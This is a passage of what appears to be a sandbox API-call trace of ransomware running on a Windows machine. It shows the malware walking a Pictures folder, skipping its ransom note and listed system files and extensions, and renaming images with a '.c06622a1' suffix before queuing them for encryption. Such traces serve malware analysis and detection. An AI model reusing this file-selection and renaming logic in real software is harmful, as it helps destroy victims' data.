_Str2="jpg") returned 5 [0155.690] wcslen (_String="ocx") returned 0x3 [0155.690] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0155.690] wcslen (_String="prf") returned 0x3 [0155.690] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0155.690] wcslen (_String="ps1") returned 0x3 [0155.690] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0155.690] wcslen (_String="rom") returned 0x3 [0155.690] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0155.690] wcslen (_String="rtp") returned 0x3 [0155.690] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0155.690] wcslen (_String="scr") returned 0x3 [0155.690] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0155.690] wcslen (_String="shs") returned 0x3 [0155.690] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0155.690] wcslen (_String="spl") returned 0x3 [0155.690] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0155.690] wcslen (_String="sys") returned 0x3 [0155.690] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0155.690] wcslen (_String="theme") returned 0x5 [0155.690] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0155.690] wcslen (_String="themepack") returned 0x9 [0155.690] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0155.690] wcslen (_String="wpx") returned 0x3 [0155.690] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0155.690] wcslen (_String="lock") returned 0x4 [0155.690] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0155.690] wcslen (_String="key") returned 0x3 [0155.690] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0155.690] wcslen (_String="hta") returned 0x3 [0155.690] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0155.690] wcslen (_String="msi") returned 0x3 [0155.690] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0155.690] wcslen (_String="pdb") returned 0x3 [0155.690] _wcsicmp (_Str1="sql", _Str2="jpg") returned 9 [0155.690] wcslen (_String="sql") returned 0x3 [0155.691] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0155.691] wcslen (_String="sqlite") returned 0x6 [0155.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.691] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.691] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.691] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.691] wcscpy (in: _Dest=0x45000f2, _Source="IIl7cZJVDTHmvn.jpg" | out: _Dest="IIl7cZJVDTHmvn.jpg") returned="IIl7cZJVDTHmvn.jpg" [0155.691] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg", dwFileAttributes=0x80) returned 1 [0155.691] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\iil7czjvdthmvn.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x658 [0155.691] SetFilePointerEx (in: hFile=0x658, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.691] ReadFile (in: hFile=0x658, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.692] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x1f99bc94 [0155.692] RtlComputeCrc32 (PartialCrc=0xbc94, Buffer=0x3fe8f4, Length=0x80) returned 0xb8a31dc5 [0155.692] RtlComputeCrc32 (PartialCrc=0x1dc5, Buffer=0x3fe8f4, Length=0x80) returned 0x77bd3c2d [0155.692] RtlComputeCrc32 (PartialCrc=0x3c2d, Buffer=0x3fe8f4, Length=0x80) returned 0x41c1261 [0155.692] RtlComputeCrc32 (PartialCrc=0x1261, Buffer=0x3fe8f4, Length=0x80) returned 0x3f11dd00 [0155.692] CloseHandle (hObject=0x658) returned 1 [0155.692] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.692] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg" [0155.692] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg") returned 0x43 [0155.692] wcscpy (in: _Dest=0x451011e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.692] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\iil7czjvdthmvn.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\iil7czjvdthmvn.jpg.c06622a1"), dwFlags=0x8) returned 1 [0155.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\IIl7cZJVDTHmvn.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\iil7czjvdthmvn.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x658 [0155.697] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.697] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2af30328 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x239af537 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2367d217 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5c5b2fe7 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x677821d2 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x53f47646 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6b329ce1 [0155.702] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1d857598 [0155.706] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0xe8a7347c [0155.706] RtlComputeCrc32 (PartialCrc=0x347c, Buffer=0x4670094, Length=0x80) returned 0x8c64bd99 [0155.706] RtlComputeCrc32 (PartialCrc=0xbd99, Buffer=0x4670094, Length=0x80) returned 0x6af5ad3 [0155.706] RtlComputeCrc32 (PartialCrc=0x5ad3, Buffer=0x4670094, Length=0x80) returned 0xc220936a [0155.706] RtlComputeCrc32 (PartialCrc=0x936a, Buffer=0x4670094, Length=0x80) returned 0xac0d3a50 [0155.706] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0155.706] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.706] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.706] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x669c8880, ftCreationTime.dwHighDateTime=0x1d5d8c1, ftLastAccessTime.dwLowDateTime=0x2e74c560, ftLastAccessTime.dwHighDateTime=0x1d5e039, ftLastWriteTime.dwLowDateTime=0x2e74c560, ftLastWriteTime.dwHighDateTime=0x1d5e039, nFileSizeHigh=0x0, nFileSizeLow=0x17ca3, dwReserved0=0x0, dwReserved1=0x0, cFileName="l30s.png", cAlternateFileName="")) returned 1 [0155.706] _wcsicmp (_Str1="l30s.png", _Str2="README.c06622a1.TXT") returned -6 [0155.706] wcsstr (_Str="l30s.png", _SubStr="README") returned 0x0 [0155.706] _wcsicmp (_Str1="autorun.inf", _Str2="l30s.png") returned -11 [0155.706] wcslen (_String="autorun.inf") returned 0xb [0155.706] _wcsicmp (_Str1="boot.ini", _Str2="l30s.png") returned -10 [0155.706] wcslen (_String="boot.ini") returned 0x8 [0155.706] _wcsicmp (_Str1="bootfont.bin", _Str2="l30s.png") returned -10 [0155.706] wcslen (_String="bootfont.bin") returned 0xc [0155.706] _wcsicmp (_Str1="bootsect.bak", _Str2="l30s.png") returned -10 [0155.706] wcslen (_String="bootsect.bak") returned 0xc [0155.706] _wcsicmp (_Str1="desktop.ini", _Str2="l30s.png") returned -8 [0155.706] wcslen (_String="desktop.ini") returned 0xb [0155.706] _wcsicmp (_Str1="iconcache.db", _Str2="l30s.png") returned -3 [0155.706] wcslen (_String="iconcache.db") returned 0xc [0155.706] _wcsicmp (_Str1="ntldr", _Str2="l30s.png") returned 2 [0155.706] wcslen (_String="ntldr") returned 0x5 [0155.706] _wcsicmp (_Str1="ntuser.dat", _Str2="l30s.png") returned 2 [0155.706] wcslen (_String="ntuser.dat") returned 0xa [0155.706] _wcsicmp (_Str1="ntuser.dat.log", _Str2="l30s.png") returned 2 [0155.706] wcslen (_String="ntuser.dat.log") returned 0xe [0155.706] _wcsicmp (_Str1="ntuser.ini", _Str2="l30s.png") returned 2 [0155.706] wcslen (_String="ntuser.ini") returned 0xa [0155.706] _wcsicmp (_Str1="thumbs.db", _Str2="l30s.png") returned 8 [0155.706] wcslen (_String="thumbs.db") returned 0x9 [0155.706] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.707] wcslen (_String="386") returned 0x3 [0155.707] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.707] wcslen (_String="adv") returned 0x3 [0155.707] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.707] wcslen (_String="ani") returned 0x3 [0155.707] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.707] wcslen (_String="bat") returned 0x3 [0155.707] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.707] wcslen (_String="bin") returned 0x3 [0155.707] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.707] wcslen (_String="cab") returned 0x3 [0155.707] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.707] wcslen (_String="cmd") returned 0x3 [0155.707] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.707] wcslen (_String="com") returned 0x3 [0155.707] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.707] wcslen (_String="cpl") returned 0x3 [0155.707] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.707] wcslen (_String="cur") returned 0x3 [0155.707] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.707] wcslen (_String="deskthemepack") returned 0xd [0155.707] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.707] wcslen (_String="diagcab") returned 0x7 [0155.707] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.707] wcslen (_String="diagcfg") returned 0x7 [0155.707] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.707] wcslen (_String="diagpkg") returned 0x7 [0155.707] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.707] wcslen (_String="dll") returned 0x3 [0155.707] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.707] wcslen (_String="drv") returned 0x3 [0155.707] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.707] wcslen (_String="exe") returned 0x3 [0155.707] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.707] wcslen (_String="hlp") returned 0x3 [0155.707] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.707] wcslen (_String="icl") returned 0x3 [0155.707] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.707] wcslen (_String="icns") returned 0x4 [0155.708] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.708] wcslen (_String="ico") returned 0x3 [0155.708] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.708] wcslen (_String="ics") returned 0x3 [0155.708] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.708] wcslen (_String="idx") returned 0x3 [0155.708] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.708] wcslen (_String="ldf") returned 0x3 [0155.708] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.708] wcslen (_String="lnk") returned 0x3 [0155.708] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.708] wcslen (_String="mod") returned 0x3 [0155.708] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.708] wcslen (_String="mpa") returned 0x3 [0155.708] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.708] wcslen (_String="msc") returned 0x3 [0155.708] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.708] wcslen (_String="msp") returned 0x3 [0155.708] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.708] wcslen (_String="msstyles") returned 0x8 [0155.708] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.708] wcslen (_String="msu") returned 0x3 [0155.708] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.708] wcslen (_String="nls") returned 0x3 [0155.708] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.708] wcslen (_String="nomedia") returned 0x7 [0155.708] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.708] wcslen (_String="ocx") returned 0x3 [0155.708] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.708] wcslen (_String="prf") returned 0x3 [0155.708] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.708] wcslen (_String="ps1") returned 0x3 [0155.708] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.708] wcslen (_String="rom") returned 0x3 [0155.708] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.708] wcslen (_String="rtp") returned 0x3 [0155.708] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.708] wcslen (_String="scr") returned 0x3 [0155.708] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.709] wcslen (_String="shs") returned 0x3 [0155.709] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.709] wcslen (_String="spl") returned 0x3 [0155.709] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.709] wcslen (_String="sys") returned 0x3 [0155.709] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.709] wcslen (_String="theme") returned 0x5 [0155.709] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.709] wcslen (_String="themepack") returned 0x9 [0155.709] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.709] wcslen (_String="wpx") returned 0x3 [0155.709] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.709] wcslen (_String="lock") returned 0x4 [0155.709] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.709] wcslen (_String="key") returned 0x3 [0155.709] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.709] wcslen (_String="hta") returned 0x3 [0155.709] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.709] wcslen (_String="msi") returned 0x3 [0155.709] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.709] wcslen (_String="pdb") returned 0x3 [0155.709] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.709] wcslen (_String="sql") returned 0x3 [0155.709] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.709] wcslen (_String="sqlite") returned 0x6 [0155.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf")) returned 0x10 [0155.709] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0155.709] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF" [0155.709] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF") returned 0x30 [0155.709] wcscpy (in: _Dest=0x45000f2, _Source="l30s.png" | out: _Dest="l30s.png") returned="l30s.png" [0155.709] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png", dwFileAttributes=0x80) returned 1 [0155.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\l30s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0155.710] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.710] ReadFile (in: hFile=0x134, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0155.711] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x273e1e0e [0155.711] RtlComputeCrc32 (PartialCrc=0x1e0e, Buffer=0x3fe8f4, Length=0x80) returned 0x9d6dde5e [0155.711] RtlComputeCrc32 (PartialCrc=0xde5e, Buffer=0x3fe8f4, Length=0x80) returned 0xc406706a [0155.711] RtlComputeCrc32 (PartialCrc=0x706a, Buffer=0x3fe8f4, Length=0x80) returned 0x113d259d [0155.711] RtlComputeCrc32 (PartialCrc=0x259d, Buffer=0x3fe8f4, Length=0x80) returned 0xff816af1 [0155.711] CloseHandle (hObject=0x134) returned 1 [0155.711] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0155.711] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png" [0155.711] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png") returned 0x39 [0155.711] wcscpy (in: _Dest=0x451010a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.711] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\l30s.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\l30s.png.c06622a1"), dwFlags=0x8) returned 1 [0155.714] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\l30s.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\l30s.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x134 [0155.714] CreateIoCompletionPort (FileHandle=0x134, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.714] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0155.720] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1f79d534 [0155.720] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x142f46db [0155.720] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x689f4832 [0155.720] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2460b5af [0155.720] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xa64aa31 [0155.721] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1968a9f8 [0155.721] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5de134c0 [0155.721] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2bd2857e [0155.724] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x5a4446b1 [0155.724] RtlComputeCrc32 (PartialCrc=0x46b1, Buffer=0x4700094, Length=0x80) returned 0xe32ead31 [0155.724] RtlComputeCrc32 (PartialCrc=0xad31, Buffer=0x4700094, Length=0x80) returned 0x29848b88 [0155.724] RtlComputeCrc32 (PartialCrc=0x8b88, Buffer=0x4700094, Length=0x80) returned 0xd28cc7b4 [0155.724] RtlComputeCrc32 (PartialCrc=0xc7b4, Buffer=0x4700094, Length=0x80) returned 0x36cc9935 [0155.724] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0155.724] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0155.724] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0155.724] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde85ded0, ftCreationTime.dwHighDateTime=0x1d5da03, ftLastAccessTime.dwLowDateTime=0x801643a0, ftLastAccessTime.dwHighDateTime=0x1d5e51e, ftLastWriteTime.dwLowDateTime=0x801643a0, ftLastWriteTime.dwHighDateTime=0x1d5e51e, nFileSizeHigh=0x0, nFileSizeLow=0x7ea1, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRx9q7P7iypouDtP4z P.bmp", cAlternateFileName="NRX9Q7~1.BMP")) returned 1 [0155.724] _wcsicmp (_Str1="nRx9q7P7iypouDtP4z P.bmp", _Str2="README.c06622a1.TXT") returned -4 [0155.724] wcsstr (_Str="nRx9q7P7iypouDtP4z P.bmp", _SubStr="README") returned 0x0 [0155.724] _wcsicmp (_Str1="autorun.inf", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned -13 [0155.724] wcslen (_String="autorun.inf") returned 0xb [0155.724] _wcsicmp (_Str1="boot.ini", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned -12 [0155.724] wcslen (_String="boot.ini") returned 0x8 [0155.724] _wcsicmp (_Str1="bootfont.bin", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned -12 [0155.724] wcslen (_String="bootfont.bin") returned 0xc [0155.724] _wcsicmp (_Str1="bootsect.bak", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned -12 [0155.724] wcslen (_String="bootsect.bak") returned 0xc [0155.724] _wcsicmp (_Str1="desktop.ini", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned -10 [0155.724] wcslen (_String="desktop.ini") returned 0xb [0155.724] _wcsicmp (_Str1="iconcache.db", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned -5 [0155.724] wcslen (_String="iconcache.db") returned 0xc [0155.724] _wcsicmp (_Str1="ntldr", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned 2 [0155.724] wcslen (_String="ntldr") returned 0x5 [0155.724] _wcsicmp (_Str1="ntuser.dat", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned 2 [0155.724] wcslen (_String="ntuser.dat") returned 0xa [0155.724] _wcsicmp (_Str1="ntuser.dat.log", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned 2 [0155.725] wcslen (_String="ntuser.dat.log") returned 0xe [0155.725] _wcsicmp (_Str1="ntuser.ini", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned 2 [0155.725] wcslen (_String="ntuser.ini") returned 0xa [0155.725] _wcsicmp (_Str1="thumbs.db", _Str2="nRx9q7P7iypouDtP4z P.bmp") returned 6 [0155.725] wcslen (_String="thumbs.db") returned 0x9 [0155.725] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0155.725] wcslen (_String="386") returned 0x3 [0155.725] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0155.725] wcslen (_String="adv") returned 0x3 [0155.725] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0155.725] wcslen (_String="ani") returned 0x3 [0155.725] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0155.725] wcslen (_String="bat") returned 0x3 [0155.725] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0155.725] wcslen (_String="bin") returned 0x3 [0155.725] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0155.725] wcslen (_String="cab") returned 0x3 [0155.725] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0155.725] wcslen (_String="cmd") returned 0x3 [0155.725] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0155.725] wcslen (_String="com") returned 0x3 [0155.725] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0155.725] wcslen (_String="cpl") returned 0x3 [0155.725] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0155.725] wcslen (_String="cur") returned 0x3 [0155.725] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0155.725] wcslen (_String="deskthemepack") returned 0xd [0155.725] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0155.725] wcslen (_String="diagcab") returned 0x7 [0155.725] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0155.725] wcslen (_String="diagcfg") returned 0x7 [0155.725] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0155.725] wcslen (_String="diagpkg") returned 0x7 [0155.725] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0155.726] wcslen (_String="dll") returned 0x3 [0155.726] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0155.726] wcslen (_String="drv") returned 0x3 [0155.726] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0155.726] wcslen (_String="exe") returned 0x3 [0155.726] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0155.726] wcslen (_String="hlp") returned 0x3 [0155.726] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0155.726] wcslen (_String="icl") returned 0x3 [0155.726] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0155.726] wcslen (_String="icns") returned 0x4 [0155.726] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0155.726] wcslen (_String="ico") returned 0x3 [0155.726] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0155.726] wcslen (_String="ics") returned 0x3 [0155.726] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0155.726] wcslen (_String="idx") returned 0x3 